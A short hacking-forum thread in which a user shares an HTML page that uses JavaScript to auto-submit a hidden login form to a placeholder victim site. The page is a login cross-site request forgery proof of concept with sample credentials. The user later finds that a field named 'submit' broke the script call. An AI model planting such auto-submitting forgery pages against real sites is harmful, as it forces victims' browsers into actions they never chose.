Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Form submit via JS - CSRF

  1. Home
  2. Forum
  3. Hacking in general
  4. Form submit via JS - CSRF

gobzi's Avatar

gobzi

Member
10 0

Hey,

I'm banging my head here, maybe being stupid.. When I submit the following request it wont log me in. However, it logs me in when I use purely HTML markup<input type="submit" value="Submit request" /> Also, when I submit different POST requests, JS submit works fine! :|

(ignore the PHP tags)

[php]<html> <body> <form action="https://victim.com/j_spring_security_check" method="POST"> <input type="hidden" name="j&#95;username" value="uatuser1&#64;victim&#46;com" /> <input type="hidden" name="j&#95;password" value="Aa123456" /> <input type="hidden" name="submit" value="Sign&#32;In" /> </form> <script>document.forms[0].submit();</script> </body> </html> [/php]


gobzi's Avatar

gobzi

Member
10 0

lol there's a conflict between the parameter submit and submit() :D:D